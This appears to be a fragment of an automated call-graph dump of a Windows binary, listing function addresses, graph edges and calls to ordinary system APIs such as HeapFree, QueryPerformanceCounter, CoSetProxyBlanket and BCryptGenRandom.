75079->75078 75080 259b3c4 HeapFree 75079->75080 75081 259b3e0 HeapFree 75079->75081 75082 259b3f9 HeapFree 75079->75082 75080->75079 75081->75079 75082->75079 75084 258a59a 75083->75084 75085 25c1a40 6 API calls 75084->75085 75086 2583b3c 75085->75086 75087 258a6fc 75086->75087 76003 25c1bb0 QueryPerformanceCounter 75087->76003 75089 258a70d 75090 25c1a40 6 API calls 75089->75090 75091 258a723 75090->75091 75092 25c1bb0 54 API calls 75091->75092 75093 258a72b 75092->75093 76015 25c1e40 75093->76015 75096 2583b41 75098 257a020 GetCommandLineW 75096->75098 75097 25cd2e0 55 API calls 75099 257a07a 75098->75099 75103 257a4fb 75098->75103 75101 257a086 75099->75101 75099->75103 75100 257a0d5 76123 25c3580 49 API calls 75100->76123 75101->75100 76122 25c1830 50 API calls 75101->76122 75104 257a5c9 HeapFree 75103->75104 75106 257a5ba HeapFree 75103->75106 75107 257a592 75103->75107 75104->75107 75106->75104 75108 257a6d5 75107->75108 75109 257a6fb 75107->75109 75111 259691e 2 API calls 75108->75111 75110 25dcaf8 50 API calls 75109->75110 75126 257a71b 75110->75126 75115 257a6e0 75111->75115 75112 257a2c3 75114 257a587 75112->75114 76125 25c3580 49 API calls 75112->76125 75119 257a690 75114->75119 75120 257a67c HeapFree 75114->75120 75117 257adfa HeapFree 75115->75117 75118 257ae09 75115->75118 75116 257a75d 76033 259691e 75116->76033 75117->75118 75118->74768 75119->75107 75123 257a696 HeapFree 75119->75123 75120->75119 75123->75107 75124 257a145 75124->75112 75124->75124 75128 25f0bd0 50 API calls 75124->75128 75131 25c1830 50 API calls 75124->75131 76124 25c3580 49 API calls 75124->76124 75126->75116 76126 25f1900 55 API calls 75126->76126 75128->75124 75129 25cc8b0 48 API calls 75130 257a80a 75129->75130 75132 25d814c 48 API calls 75130->75132 75131->75124 75133 257a83e 75132->75133 75134 257a862 HeapFree 75133->75134 75135 257a872 75133->75135 75134->75135 75136 257ae39 75135->75136 76039 2561b50 75135->76039 76075 25cca50 75136->76075 75138 257ad17 75140 257ad2d 75138->75140 75141 257ad1d HeapFree 75138->75141 76128 25d0450 48 API calls 75140->76128 75141->75140 75142 257ae73 76087 2581838 75142->76087 75143 257ab70 75143->75138 75155 257ab99 75143->75155 76127 2569950 48 API calls 75143->76127 75145 257abb6 75148 257abe4 75145->75148 75149 257abd4 HeapFree 75145->75149 76054 25c6a20 75148->76054 75149->75148 75151 257ad42 76129 25ca170 48 API calls 75151->76129 75152 257ae92 76106 257ea66 75152->76106 75153 257aeaa 76130 25800bf 48 API calls 75153->76130 75155->75138 75155->75145 75160 257aea5 75162 25cd2e0 55 API calls 75160->75162 75161 25617d0 49 API calls 75163 257ac44 75161->75163 75166 257aeca 75162->75166 75174 257ac5f HeapFree 75163->75174 75175 257ac6e 75163->75175 75170 257aef7 75166->75170 75171 257aee3 HeapFree 75166->75171 75170->74768 75171->75170 75174->75175 75177 257ac85 75175->75177 75178 257ac74 HeapFree 75175->75178 75179 257ac9f 75177->75179 75180 257ac8e HeapFree 75177->75180 75178->75177 76073 25c9970 75179->76073 75180->75179 75186 25d8153 75185->75186 75189 2583b5a 75185->75189 75187 25d8155 75186->75187 75188 25d8183 75186->75188 75191 25cd430 2 API calls 75187->75191 76188 25610d0 48 API calls 75188->76188 75194 258a769 62 API calls 75189->75194 75192 25d816c 75191->75192 75192->75189 76187 25ec900 48 API calls 75192->76187 75194->74779 75197 25618f6 75195->75197 75198 256180d 75195->75198 75196 256192d 75196->74784 75197->75196 76190 25610d0 48 API calls 75197->76190 75198->75197 75200 25cd430 2 API calls 75198->75200 75201 25618df 75200->75201 75201->75197 76189 25ec900 48 API calls 75201->76189 75202 256197f 75203 256199e 75202->75203 75204 256198d HeapFree 75202->75204 75203->74784 75204->75203 76191 25c5900 75206->76191 75210 25623d0 75209->75210 75213 25623f4 75209->75213 75211 25623d2 75210->75211 75212 2562411 75210->75212 75214 25cd430 2 API calls 75211->75214 76226 25610d0 48 API calls 75212->76226 75213->74811 75217 25623e2 75214->75217 75216 2562416 75217->75213 76225 25ec900 48 API calls 75217->76225 75222 25d8608 75219->75222 75220 258430b 75220->74816 75220->74819 75222->75220 76227 25d832f 50 API calls 75222->76227 75224 25d873e 75224->75220 76228 25f1847 50 API calls 75224->76228 75225->74822 75226->74818 75227->74746 75228->74833 75229->74864 75230->74890 75231->74845 75232->74845 75233->74818 75234->74908 75235->74908 75236->74908 75237->74908 75238->74908 75239->74908 75240->74908 75241->74908 75242->74908 75243->74913 75245 25967dd 50 API calls 75244->75245 75246 2596700 75245->75246 75247 25cd430 2 API calls 75246->75247 75255 2596791 75246->75255 75248 2596721 75247->75248 75249 2596729 75248->75249 75250 25967ce 75248->75250 75252 25967dd 50 API calls 75249->75252 76229 25ec900 48 API calls 75250->76229 75253 2596764 75252->75253 75254 25967dd 50 API calls 75253->75254 75253->75255 75254->75253 75255->74775 75256->74870 76230 25cd2f0 54 API calls 75257->76230 75259 25cd2e8 76231 25cd330 ExitProcess 75259->76231 75262->74776 75263->74783 75264->74796 75266 25c1a59 75265->75266 75267 25c1a61 CreateWaitableTimerExW 75265->75267 75266->75267 75268 25c1b40 75266->75268 75267->75268 75269 25c1a7d 75267->75269 75271 25c1b2e 75268->75271 75270 25c1b30 CloseHandle 75269->75270 75274 25c1ac5 SetWaitableTimer 75269->75274 75270->75268 75271->75268 75272 25c1b8e Sleep 75271->75272 75273 258651e 75272->75273 75273->74797 75274->75270 75275 25c1afb WaitForSingleObject CloseHandle 75274->75275 75275->75271 75275->75273 75276->74931 75277->74930 75278->74930 75279->74932 75280->74924 75281->74953 75283->74954 75285 25d982f 75284->75285 75286 25d978f 75284->75286 75777 25d8b49 8 API calls 75285->75777 75296 259aa3a 75286->75296 75753 25d91d2 75286->75753 75290 25d984d 75778 25d8b49 8 API calls 75290->75778 75291 25d97dc 75293 25d97e7 75291->75293 75294 25d9860 75291->75294 75298 25d97eb SysFreeString 75293->75298 75299 25d97f2 CoSetProxyBlanket 75293->75299 75294->75296 75297 25d9864 SysFreeString 75294->75297 75295 25d9854 75295->75294 75296->74959 75296->74961 75297->75296 75298->75299 75299->75296 75300 25d9883 75299->75300 75779 25d8b49 8 API calls 75300->75779 75302 25d9836 75302->75296 75304 25d91d2 62 API calls 75303->75304 75305 2581c5a 75304->75305 75306 25d91d2 62 API calls 75305->75306 75307 2581c66 75306->75307 75785 2581ba7 75307->75785 75310 2581cb9 75312 2581cc8 75310->75312 75313 2581cc1 SysFreeString 75310->75313 75311 2581c7f 75316 2581c9c 75311->75316 75317 2581c95 SysFreeString 75311->75317 75314 2581ccc SysFreeString 75312->75314 75315 2581cd3 75312->75315 75313->75312 75314->75315 75791 2580194 75315->75791 75319 2581ca0 SysFreeString 75316->75319 75320 2581ca7 75316->75320 75317->75316 75319->75320 75320->74965 75320->74971 75331 259922b 75330->75331 75332 259921b 75330->75332 75333 2599241 75331->75333 75334 2599231 HeapFree 75331->75334 75332->75331 75910 25726a3 HeapFree HeapFree 75332->75910 75333->74970 75334->75333 75337 25991cb 75336->75337 75338 25991f1 75336->75338 75337->75338 75341 25991df HeapFree 75337->75341 75339 2599207 75338->75339 75340 25991f7 HeapFree 75338->75340 75339->75060 75340->75339 75341->75337 75343 25967ee 75342->75343 75344 25967f3 75342->75344 75343->74973 75344->75343 75911 25eca90 48 API calls 75344->75911 75352 25d9760 66 API calls 75351->75352 75353 259bd2c 75352->75353 75354 25cd430 2 API calls 75353->75354 75734 25a0100 75353->75734 75356 259bd5a 75354->75356 75357 25a01a0 75356->75357 75359 259bd69 75356->75359 76000 25ec900 48 API calls 75357->76000 75359->75359 75360 25d814c 48 API calls 75359->75360 75361 259bdda 75360->75361 75361->75361 75362 25d814c 48 API calls 75361->75362 75364 259be75 75362->75364 75363 25a01af 75363->74986 75365 25d814c 48 API calls 75364->75365 75366 259bf1e 75365->75366 75367 25d814c 48 API calls 75366->75367 75368 259bfc4 75367->75368 75369 25d814c 48 API calls 75368->75369 75370 259c052 75369->75370 75371 25d814c 48 API calls 75370->75371 75372 259c0f7 75371->75372 75373 25d814c 48 API calls 75372->75373 75374 259c183 75373->75374 75375 25d814c 48 API calls 75374->75375 75376 259c217 75375->75376 75377 25d814c 48 API calls 75376->75377 75427 259c2a7 75377->75427 75378 259c6ae 75380 25991b0 2 API calls 75378->75380 75379 25623c0 48 API calls 75379->75427 75382 259c6cf 75380->75382 75381 25d91d2 62 API calls 75381->75427 75382->75382 75384 2581c36 94 API calls 75382->75384 75383 2581ba7 8 API calls 75383->75427 75385 259c75c 75384->75385 75386 259c823 75385->75386 75392 259c76b 75385->75392 75922 25cc4e0 54 API calls 75386->75922 75387 259c473 SysFreeString 75387->75427 75389 259c456 SysFreeString 75389->75427 75390 259c491 SysFreeString 75390->75427 75391 259c870 75923 25d95b0 HeapFree 75391->75923 75397 2581c36 94 API calls 75392->75397 75561 259c794 75392->75561 75393 259c4a2 HeapFree 75393->75427 75395 2581bfe 3 API calls 75408 259e59c 75395->75408 75396 259c7a2 75920 25cc4e0 54 API calls 75396->75920 75400 259c9e5 75397->75400 75398 259c889 75401 25623c0 48 API calls 75398->75401 75403 259e537 75400->75403 75418 259c9fe 75400->75418 75405 259c8b7 75401->75405 75402 259c817 75921 25d95b0 HeapFree 75402->75921 75955 25cc4e0 54 API calls 75403->75955 75924 25cc4e0 54 API calls 75405->75924 75415 259c877 75408->75415 75957 25d95b0 HeapFree 75408->75957 75410 259c690 HeapFree 75410->75427 75411 259e584 75956 25d95b0 HeapFree 75411->75956 75412 259c81e 75422 259c939 75412->75422 75423 259c924 HeapFree 75412->75423 75413 2580194 85 API calls 75413->75427 75415->74986 75416 259c8f5 75420 259c8fc HeapFree 75416->75420 75421 259c90e 75416->75421 75418->75418 75426 25d814c 48 API calls 75418->75426 75419 2581bfe HeapFree HeapFree HeapFree 75419->75427 75420->75421 75424 2581bfe 3 API calls 75421->75424 75425 25991b0 2 API calls 75422->75425 75423->75422 75424->75412 75425->75415 75428 259caac 75426->75428 75427->75378 75427->75379 75427->75381 75427->75383 75427->75387 75427->75389 75427->75390 75427->75393 75427->75396 75427->75398 75427->75410 75427->75413 75427->75419 75918 25836d9 50 API calls 75427->75918 75919 25eeb2c 50 API calls 75427->75919 75431 259caec 75428->75431 75925 25837b6 50 API calls 75428->75925 75431->75431 75432 25d814c 48 API calls 75431->75432 75433 259cb88 75432->75433 75435 259cbc8 75433->75435 75926 25837b6 50 API calls 75433->75926 75435->75435 75436 25d814c 48 API calls 75435->75436 75437 259cc64 75436->75437 75439 259cca4 75437->75439 75927 25837b6 50 API calls 75437->75927 75439->75439 75440 25d814c 48 API calls 75439->75440 75441 259cd40 75440->75441 75443 259cd80 75441->75443 75928 25837b6 50 API calls 75441->75928 75443->75443 75444 25d814c 48 API calls 75443->75444 75445 259ce1c 75444->75445 75447 259ce5c 75445->75447 75929 25837b6 50 API calls 75445->75929 75447->75447 75448 25d814c 48 API calls 75447->75448 75449 259cef8 75448->75449 75451 259cf38 75449->75451 75930 25837b6 50 API calls 75449->75930 75452 25d814c 48 API calls 75451->75452 75453 259cfd4 75452->75453 75455 259d014 75453->75455 75931 25837b6 50 API calls 75453->75931 75455->75455 75456 25d814c 48 API calls 75455->75456 75457 259d0b0 75456->75457 75459 259d0f0 75457->75459 75932 25837b6 50 API calls 75457->75932 75459->75459 75460 25d814c 48 API calls 75459->75460 75461 259d18c 75460->75461 75463 259d1cc 75461->75463 75933 25837b6 50 API calls 75461->75933 75464 25d814c 48 API calls 75463->75464 75465 259d268 75464->75465 75467 259d2a8 75465->75467 75934 25837b6 50 API calls 75465->75934 75467->75467 75468 25d814c 48 API calls 75467->75468 75469 259d344 75468->75469 75471 259d384 75469->75471 75935 25837b6 50 API calls 75469->75935 75471->75471 75472 25d814c 48 API calls 75471->75472 75473 259d431 75472->75473 75475 259d471 75473->75475 75936 25837b6 50 API calls 75473->75936 75475->75475 75476 25d814c 48 API calls 75475->75476 75477 259d51e 75476->75477 75479 259d55e 75477->75479 75937 25837b6 50 API calls 75477->75937 75479->75479 75480 25d814c 48 API calls 75479->75480 75481 259d5fa 75480->75481 75483 259d63a 75481->75483 75938 25837b6 50 API calls 75481->75938 75484 25d814c 48 API calls 75483->75484 75485 259d6d6 75484->75485 75487 259d716 75485->75487 75939 25837b6 50 API calls 75485->75939 75487->75487 75488 25d814c 48 API calls 75487->75488 75489 259d7b2 75488->75489 75491 259d7f2 75489->75491 75940 25837b6 50 API calls 75489->75940 75491->75491 75492 25d814c 48 API calls 75491->75492 75493 259d88e 75492->75493 75495 259d8ce 75493->75495 75941 25837b6 50 API calls 75493->75941 75496 25d814c 48 API calls 75495->75496 75497 259d96a 75496->75497 75499 259d9aa 75497->75499 75942 25837b6 50 API calls 75497->75942 75499->75499 75500 25d814c 48 API calls 75499->75500 75501 259da46 75500->75501 75503 259da86 75501->75503 75943 25837b6 50 API calls 75501->75943 75503->75503 75504 25d814c 48 API calls 75503->75504 75505 259db22 75504->75505 75507 259db62 75505->75507 75944 25837b6 50 API calls 75505->75944 75507->75507 75508 25d814c 48 API calls 75507->75508 75509 259dbfe 75508->75509 75511 259dc3e 75509->75511 75945 25837b6 50 API calls 75509->75945 75511->75511 75512 25d814c 48 API calls 75511->75512 75513 259dcda 75512->75513 75515 259dd1a 75513->75515 75946 25837b6 50 API calls 75513->75946 75516 25d814c 48 API calls 75515->75516 75517 259ddb6 75516->75517 75519 259ddf6 75517->75519 75947 25837b6 50 API calls 75517->75947 75519->75519 75520 25d814c 48 API calls 75519->75520 75521 259de92 75520->75521 75523 259ded2 75521->75523 75948 25837b6 50 API calls 75521->75948 75523->75523 75524 25d814c 48 API calls 75523->75524 75525 259df6e 75524->75525 75527 259dfae 75525->75527 75949 25837b6 50 API calls 75525->75949 75528 25d814c 48 API calls 75527->75528 75529 259e04a 75528->75529 75531 259e08a 75529->75531 75950 25837b6 50 API calls 75529->75950 75531->75531 75532 25d814c 48 API calls 75531->75532 75533 259e126 75532->75533 75535 259e166 75533->75535 75951 25837b6 50 API calls 75533->75951 75535->75535 75536 25d814c 48 API calls 75535->75536 75537 259e202 75536->75537 75539 259e242 75537->75539 75952 25837b6 50 API calls 75537->75952 75539->75539 75540 25d814c 48 API calls 75539->75540 75541 259e2de 75540->75541 75543 259e31e 75541->75543 75953 25837b6 50 API calls 75541->75953 75543->75543 75544 25d814c 48 API calls 75543->75544 75545 259e3ba 75544->75545 75551 259e3fc 75545->75551 75954 25837b6 50 API calls 75545->75954 75546 259e52e 75548 25991b0 2 API calls 75546->75548 75549 259e5ed 75548->75549 75549->75549 75550 25c68a0 65 API calls 75549->75550 75553 259e67c 75550->75553 75551->75363 75551->75546 75552 25a0130 75551->75552 75554 25991b0 2 API calls 75552->75554 75553->75363 75555 25d814c 48 API calls 75553->75555 75556 25a0149 75554->75556 75557 259e6f2 75555->75557 75560 2581bfe 3 API calls 75556->75560 75558 259e712 75557->75558 75958 25837b6 50 API calls 75557->75958 75562 25d814c 48 API calls 75558->75562 75560->75561 75561->75395 75563 259e76d 75562->75563 75564 259e78e 75563->75564 75959 25837b6 50 API calls 75563->75959 75566 25d814c 48 API calls 75564->75566 75567 259e7df 75566->75567 75569 259e7fa 75567->75569 75960 25837b6 50 API calls 75567->75960 75570 25d814c 48 API calls 75569->75570 75571 259e87b 75570->75571 75572 259e8a5 75571->75572 75961 25837b6 50 API calls 75571->75961 75574 25d814c 48 API calls 75572->75574 75575 259e8f2 75574->75575 75577 259e90d 75575->75577 75962 25837b6 50 API calls 75575->75962 75578 25d814c 48 API calls 75577->75578 75579 259e99d 75578->75579 75581 259e9c9 75579->75581 75963 25837b6 50 API calls 75579->75963 75582 25d814c 48 API calls 75581->75582 75583 259ea78 75582->75583 75585 259ea9c 75583->75585 75964 25837b6 50 API calls 75583->75964 75586 25d814c 48 API calls 75585->75586 75587 259eb59 75586->75587 75589 259eb83 75587->75589 75965 25837b6 50 API calls 75587->75965 75590 25d814c 48 API calls 75589->75590 75591 259ec06 75590->75591 75592 259ec30 75591->75592 75966 25837b6 50 API calls 75591->75966 75594 25d814c 48 API calls 75592->75594 75595 259ec92 75594->75595 75596 259ecba 75595->75596 75967 25837b6 50 API calls 75595->75967 75598 25d814c 48 API calls 75596->75598 75599 259ed15 75598->75599 75601 259ed36 75599->75601 75968 25837b6 50 API calls 75599->75968 75602 25d814c 48 API calls 75601->75602 75603 259edbd 75602->75603 75605 259ede5 75603->75605 75969 25837b6 50 API calls 75603->75969 75606 25d814c 48 API calls 75605->75606 75607 259eea0 75606->75607 75608 259eecc 75607->75608 75970 25837b6 50 API calls 75607->75970 75610 25d814c 48 API calls 75608->75610 75611 259ef1f 75610->75611 75612 259ef3f 75611->75612 75971 25837b6 50 API calls 75611->75971 75614 25d814c 48 API calls 75612->75614 75615 259efa5 75614->75615 75616 259efcd 75615->75616 75972 25837b6 50 API calls 75615->75972 75618 25d814c 48 API calls 75616->75618 75619 259f033 75618->75619 75620 259f05b 75619->75620 75973 25837b6 50 API calls 75619->75973 75622 25d814c 48 API calls 75620->75622 75623 259f0b8 75622->75623 75625 259f0d9 75623->75625 75974 25837b6 50 API calls 75623->75974 75626 25d814c 48 API calls 75625->75626 75627 259f182 75626->75627 75629 259f1a2 75627->75629 75975 25837b6 50 API calls 75627->75975 75630 25d814c 48 API calls 75629->75630 75631 259f236 75630->75631 75633 259f262 75631->75633 75976 25837b6 50 API calls 75631->75976 75634 25d814c 48 API calls 75633->75634 75635 259f2f4 75634->75635 75637 259f320 75635->75637 75977 25837b6 50 API calls 75635->75977 75638 25d814c 48 API calls 75637->75638 75639 259f3b0 75638->75639 75640 259f3de 75639->75640 75978 25837b6 50 API calls 75639->75978 75642 25d814c 48 API calls 75640->75642 75643 259f431 75642->75643 75644 259f451 75643->75644 75979 25837b6 50 API calls 75643->75979 75646 25d814c 48 API calls 75644->75646 75647 259f4a2 75646->75647 75649 259f4bd 75647->75649 75980 25837b6 50 API calls 75647->75980 75650 25d814c 48 API calls 75649->75650 75651 259f53f 75650->75651 75653 259f56c 75651->75653 75981 25837b6 50 API calls 75651->75981 75654 25d814c 48 API calls 75653->75654 75655 259f5ee 75654->75655 75656 259f61b 75655->75656 75982 25837b6 50 API calls 75655->75982 75658 25d814c 48 API calls 75656->75658 75659 259f672 75658->75659 75660 259f693 75659->75660 75983 25837b6 50 API calls 75659->75983 75662 25d814c 48 API calls 75660->75662 75663 259f6ea 75662->75663 75664 259f70a 75663->75664 75984 25837b6 50 API calls 75663->75984 75666 25d814c 48 API calls 75664->75666 75667 259f770 75666->75667 75668 259f798 75667->75668 75985 25837b6 50 API calls 75667->75985 75670 25d814c 48 API calls 75668->75670 75671 259f7fe 75670->75671 75672 259f826 75671->75672 75986 25837b6 50 API calls 75671->75986 75674 25d814c 48 API calls 75672->75674 75675 259f883 75674->75675 75677 259f8a4 75675->75677 75987 25837b6 50 API calls 75675->75987 75678 25d814c 48 API calls 75677->75678 75679 259f972 75678->75679 75680 259f99c 75679->75680 75988 25837b6 50 API calls 75679->75988 75682 25d814c 48 API calls 75680->75682 75683 259f9ef 75682->75683 75684 259fa0f 75683->75684 75989 25837b6 50 API calls 75683->75989 75686 25d814c 48 API calls 75684->75686 75687 259fa7e 75686->75687 75689 259faad 75687->75689 75990 25837b6 50 API calls 75687->75990 75690 25d814c 48 API calls 75689->75690 75691 259fb5c 75690->75691 75693 259fb80 75691->75693 75991 25837b6 50 API calls 75691->75991 75694 25d814c 48 API calls 75693->75694 75695 259fc29 75694->75695 75696 259fc49 75695->75696 75992 25837b6 50 API calls 75695->75992 75698 25d814c 48 API calls 75696->75698 75699 259fcaf 75698->75699 75700 259fcd7 75699->75700 75993 25837b6 50 API calls 75699->75993 75702 25d814c 48 API calls 75700->75702 75703 259fd32 75702->75703 75704 259fd53 75703->75704 75994 25837b6 50 API calls 75703->75994 75706 25d814c 48 API calls 75704->75706 75707 259fdb0 75706->75707 75709 259fdd1 75707->75709 75995 25837b6 50 API calls 75707->75995 75710 25d814c 48 API calls 75709->75710 75711 259fe89 75710->75711 75713 259feb1 75711->75713 75996 25837b6 50 API calls 75711->75996 75714 25d814c 48 API calls 75713->75714 75715 259ff5a 75714->75715 75716 259ff7a 75715->75716 75997 25837b6 50 API calls 75715->75997 75718 25d814c 48 API calls 75716->75718 75719 259ffe0 75718->75719 75724 25a0008 75719->75724 75998 25837b6 50 API calls 75719->75998 75721 25a00bb 75722 25991b0 2 API calls 75721->75722 75723 25a00c9 75722->75723 75725 25a00e8 75723->75725 75726 25a00d3 HeapFree 75723->75726 75724->75721 75728 25a0099 HeapFree 75724->75728 75731 25a014b 75724->75731 75912 2581bfe 75725->75912 75726->75725 75728->75724 75730 2581bfe 3 API calls 75730->75734 75732 25a0162 75731->75732 75733 25a0153 HeapFree 75731->75733 75735 25991b0 2 API calls 75732->75735 75733->75732 75734->75415 75999 25d95b0 HeapFree 75734->75999 75736 25a0169 75735->75736 75736->75556 75737 25a0173 HeapFree 75736->75737 75737->75556 75738->74971 75739->74971 75742->75006 75743->75018 75744->75032 75745->75045 75746->75049 75747->75054 75748->75079 75749->74998 75750->74998 76002 25cc8c4 48 API calls 75751->76002 75754 25d9235 75753->75754 75756 25d91dd 75753->75756 75754->75290 75754->75291 75755 25d9460 75782 25610d0 48 API calls 75755->75782 75756->75754 75756->75755 75757 25d92cf 75756->75757 75759 25cd430 2 API calls 75757->75759 75761 25d92dd 75759->75761 75760 25d9465 75783 25ec900 48 API calls 75760->75783 75761->75760 75770 25d92e5 75761->75770 75763 25d9471 75784 25d8b49 8 API calls 75763->75784 75765 25d947b 75767 25d947f 75765->75767 75766 25d9405 75768 25d9441 75766->75768 75769 25d9411 SysAllocStringLen 75766->75769 75768->75754 75774 25d9447 HeapFree 75768->75774 75769->75763 75772 25d941d SysStringLen 75769->75772 75770->75766 75780 25f1847 50 API calls 75770->75780 75772->75768 75773 25d942a 75772->75773 75781 25d8b49 8 API calls 75773->75781 75774->75754 75776 25d9434 SysFreeString 75776->75767 75777->75302 75778->75295 75779->75302 75780->75770 75781->75776 75782->75760 75783->75763 75784->75765 75786 2581bc8 75785->75786 75787 2581bda 75786->75787 75788 2581bcc 75786->75788 75793 25d8b49 8 API calls 75787->75793 75788->75310 75788->75311 75790 2581be1 75790->75788 75794 25801bb 75791->75794 75793->75790 75795 25801cf 75794->75795 75796 25801fd 75795->75796 75797 25801d3 75795->75797 75848 25d8b49 8 API calls 75796->75848 75801 25801f6 75797->75801 75847 25d95b0 HeapFree 75797->75847 75799 2580204 75799->75801 75802 2580343 75801->75802 75806 258027c 75801->75806 75829 258033c 75801->75829 75861 25d8b49 8 API calls 75802->75861 75804 258034a 75804->75829 75805 2580369 SafeArrayDestroy 75809 2580c62 75805->75809 75810 25803dc 75805->75810 75806->75805 75849 25dcaf8 75806->75849 75894 25d8b49 8 API calls 75809->75894 75810->75829 75863 25d04d0 75810->75863 75811 25802c5 75813 2580e75 75811->75813 75819 25802e6 75811->75819 75898 25f1900 55 API calls 75813->75898 75816 2580c82 75820 2580c9c 75816->75820 75821 2580cc3 75816->75821 75817 2580338 75862 25da581 HeapFree 75817->75862 75819->75817 75823 258102f 75819->75823 75820->75804 75827 2580cb2 HeapFree 75820->75827 75895 25d95b0 HeapFree 75821->75895 75900 25ecaf0 48 API calls 75823->75900 75825 25d814c 48 API calls 75843 258040c 75825->75843 75826 2581043 75827->75804 75828 2580d72 75828->75829 75830 2580f66 HeapFree 75828->75830 75830->75829 75831 2580ddb 75832 2580f1d HeapFree 75831->75832 75833 2580e70 75831->75833 75832->75833 75899 25726a3 HeapFree HeapFree 75833->75899 75835 2580dc6 75896 25d8b49 8 API calls 75835->75896 75838 258092e VariantClear 75839 2580e02 75838->75839 75838->75843 75897 25d8b49 8 API calls 75839->75897 75841 2580dcd 75841->75831 75843->75825 75843->75826 75843->75828 75843->75831 75843->75833 75843->75835 75843->75838 75844 2580c4d 75843->75844 75846 2580b84 HeapFree 75843->75846 75891 25da5bc 49 API calls 75843->75891 75892 2596b04 50 API calls 75843->75892 75893 25ed3d0 50 API calls 75844->75893 75846->75843 75848->75799 75850 25dcb36 75849->75850 75851 25dcb00 75849->75851 75850->75811 75852 25dcb40 75851->75852 75853 25dcb16 75851->75853 75902 25610d0 48 API calls 75852->75902 75855 25cd430 2 API calls 75853->75855 75857 25dcb24 75855->75857 75856 25dcb45 75860 25dcbb8 75856->75860 75903 25d8210 HeapReAlloc HeapFree GetProcessHeap RtlAllocateHeap 75856->75903 75857->75850 75901 25ec900 48 API calls 75857->75901 75860->75811 75861->75804 75862->75805 75864 25d04e7 TlsGetValue 75863->75864 75865 25d05b2 75863->75865 75868 25d04f4 75864->75868 75904 25f0970 48 API calls 75865->75904 75869 25d050e TlsGetValue 75868->75869 75875 25d057e 75868->75875 75905 25f0970 48 API calls 75868->75905 75872 25d051b 75869->75872 75869->75875 75873 25d0564 BCryptGenRandom 75872->75873 75874 25cd430 2 API calls 75872->75874 75873->75875 75876 25d0534 75874->75876 75875->75843 75877 25d05dc 75876->75877 75878 25d053c 75876->75878 75907 25ec900 48 API calls 75877->75907 75879 25d055b TlsSetValue 75878->75879 75906 25f0970 48 API calls 75878->75906 75879->75873 75883 25d05eb 75884 25d0629 TlsSetValue HeapFree 75883->75884 75908 25f0970 48 API calls 75883->75908 75887 25d0668 75884->75887 75888 25d0665 75884->75888 75909 25f0970 48 API calls 75887->75909 75889 25d067a TlsSetValue 75888->75889 75889->75843 75893->75809 75894->75816 75896->75841 75897->75841 75898->75831 75899->75828 75901->75850 75902->75856 75903->75860 75904->75864 75905->75869 75906->75879 75907->75883 75908->75884 75909->75889 75910->75332 75913 2581c1d 75912->75913 75914 2581c0e 75912->75914 75915 2581c31 75913->75915 75916 2581c22 HeapFree 75913->75916 75914->75913 76001 25726a3 HeapFree HeapFree 75914->76001 75915->75730 75916->75915 75918->75427 75919->75427 75920->75402 75922->75391 75924->75416 75925->75431 75926->75435 75927->75439 75928->75443 75929->75447 75930->75451 75931->75455 75932->75459 75933->75463 75934->75467 75935->75471 75936->75475 75937->75479 75938->75483 75939->75487 75940->75491 75941->75495 75942->75499 75943->75503 75944->75507 75945->75511 75946->75515 75947->75519 75948->75523 75949->75527 75950->75531 75951->75535 75952->75539 75953->75543 75954->75551 75955->75411 75958->75558 75959->75564 75960->75569 75961->75572 75962->75577 75963->75581 75964->75585 75965->75589 75966->75592 75967->75596 75968->75601 75969->75605 75970->75608 75971->75612 75972->75616 75973->75620 75974->75625 75975->75629 75976->75633 75977->75637 75978->75640 75979->75644 75980->75649 75981->75653 75982->75656 75983->75660 75984->75664 75985->75668 75986->75672 75987->75677 75988->75680 75989->75684 75990->75689 75991->75693 75992->75696 75993->75700 75994->75704 75995->75709 75996->75713 75997->75716 75998->75724 76000->75363 76001->75914 76004 25c1d0a GetLastError 76003->76004 76005 25c1c05 76003->76005 76013 25c1d3e 76004->76013 76006 25c1c26 QueryPerformanceFrequency 76005->76006 76012 25c1c66 76005->76012 76007 25c1c46 76006->76007 76008 25c1d43 GetLastError 76006->76008 76007->76012 76029 25ecaf0 48 API calls 76007->76029 76008->76013 76009 25c1dd6 76009->75089 76011 25c1dc7 HeapFree 76011->76009 76012->75089 76013->76009 76013->76011 76014 25c1db6 HeapFree 76013->76014 76014->76011 76016 25c1e92 QueryPerformanceFrequency 76015->76016 76022 25c1ecf 76015->76022 76017 25c208c GetLastError 76016->76017 76018 25c1eb2 76016->76018 76019 25c20c0 76017->76019 76018->76022 76030 25ecaf0 48 API calls 76018->76030 76032 25ece40 48 API calls 76019->76032 76021 258a747 76021->75096 76021->75097 76022->76019 76022->76021 76031 25ec9a0 48 API calls 76022->76031 76034 2596952 76033->76034 76035 259692e 76033->76035 76036 257a7e0 76034->76036 76037 2596958 HeapFree 76034->76037 76035->76034 76038 2596940 HeapFree 76035->76038 76036->75115 76036->75129 76037->76036 76038->76035 76040 2561b8e 76039->76040 76051 2561ba6 76039->76051 76041 2561dc2 76040->76041 76043 25cd430 2 API calls 76040->76043 76131 25610d0 48 API calls 76041->76131 76043->76051 76044 2562153 76132 25ec900 48 API calls 76044->76132 76045 25620f4 76045->75143 76047 256215f 76048 256217e 76047->76048 76049 256216d HeapFree 76047->76049 76048->75143 76049->76048 76050 2561a50 48 API calls 76050->76051 76051->76041 76051->76044 76051->76045 76051->76050 76052 256e390 48 API calls 76051->76052 76053 256e490 48 API calls 76051->76053 76052->76051 76053->76051 76057 25c6a83 76054->76057 76055 25c6ae1 SetLastError 76055->76057 76057->76055 76058 25c6af8 GetLastError 76057->76058 76060 25c6b0a GetLastError 76057->76060 76063 25c6b37 76057->76063 76133 25f0bd0 50 API calls 76057->76133 76058->76057 76059 25c6bbe GetLastError 76058->76059 76061 25c6b70 HeapFree 76059->76061 76069 25c6b8b 76059->76069 76060->76057 76062 25c6bda 76060->76062 76061->76069 76135 25ecaf0 48 API calls 76062->76135 76065 25c6b49 76063->76065 76066 25c6c3b 76063->76066 76134 25c3580 49 API calls 76065->76134 76136 25eca90 48 API calls 76066->76136 76071 25c6c5d HeapFree 76069->76071 76072 257abee 76069->76072 76070 25c6b54 76070->76061 76070->76069 76071->76072 76072->75161 76137 25c999a 48 API calls 76073->76137 76076 25ccaad 76075->76076 76077 25cca89 76075->76077 76076->75142 76078 25ccafe 76077->76078 76079 25cca8b 76077->76079 76139 25610d0 48 API calls 76078->76139 76080 25cd430 2 API calls 76079->76080 76082 25cca9b 76080->76082 76082->76076 76138 25ec900 48 API calls 76082->76138 76083 25ccb03 76084 25ccb1d HeapFree 76083->76084 76085 25ccb2e 76083->76085 76084->76085 76085->75142 76088 25c1410 52 API calls 